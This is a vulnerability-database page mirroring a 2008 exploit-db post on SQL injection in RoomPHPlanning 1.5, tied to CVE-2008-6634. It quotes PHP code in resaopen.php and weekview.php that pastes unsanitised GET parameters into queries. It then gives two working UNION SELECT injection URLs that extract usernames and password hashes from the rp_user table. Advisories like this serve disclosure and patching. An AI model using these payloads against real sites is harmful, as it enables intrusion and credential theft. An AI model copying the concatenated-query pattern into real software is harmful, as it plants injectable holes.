Lucene search
+L

RoomPHPlanning 1.5 - Multiple SQL Injections

🗓️ 26 May 2008 00:00:00Reported by Virangar SecurityType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 34 Views

RoomPHPlanning 1.5 SQL Injection Vulnerabilitie

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-6634
26 May 200800:00
circl
CVE
CVE-2008-6634
7 Apr 200910:00
cve
Cvelist
CVE-2008-6634
7 Apr 200910:00
cvelist
EUVD
EUVD-2008-6596
7 Oct 202500:30
euvd
NVD
CVE-2008-6634
7 Apr 200914:17
nvd
Prion
Sql injection
7 Apr 200914:17
prion
  #######################################################################################
  #                                                                                     #
  #           ...::::RoomPHPlanning 1.5 SQL Injection Vulnerabilities ::::...           #
  #######################################################################################

Virangar Security Team

www.virangar.net
www.virangar.ir

--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-----

-------vuln codes in:-----------
resaopen.php:
line 7:@$idresa = $_GET['idresa'];
..
..
ine 102:$qry = "SELECT IdRm, R.IdUs, TitleRs,".
   "DateRs, BegRs, EndRs, DescRs,".
   "BillRs, NameUs ".
   "FROM ".RESA." R, ".USER." U ".
   "WHERE IdRs=".$idresa." ".
   "AND R.IdUs=U.IdUs";

*********
weekview.php:
@$idroom =  $_GET['idroom'];
....
line 47:$qry =  "SELECT NameRm, BkcolRm, FtcolRm ".
  "FROM ".ROOM." WHERE IdRm=".$idroom ;
---
exploits:
http://site.com/resaopen.php?idresa=-99999/**/union/**/select/**/1,2,3,4,5,6,concat(LoginUs,0x3a,char(58),PwdUs),8,9/**/from/**/rp_user/**/where/**/IdRk=1/*
http://site.com/weekview.php?idroom=-999/**/union/**/select/**/concat(LoginUs,0x3a,char(58),PwdUs),2,3/**/from/**/rp_user/**/where/**/IdRk=1/*
---
young iranian h4ck3rz

# milw0rm.com [2008-05-26]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 May 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.00973
34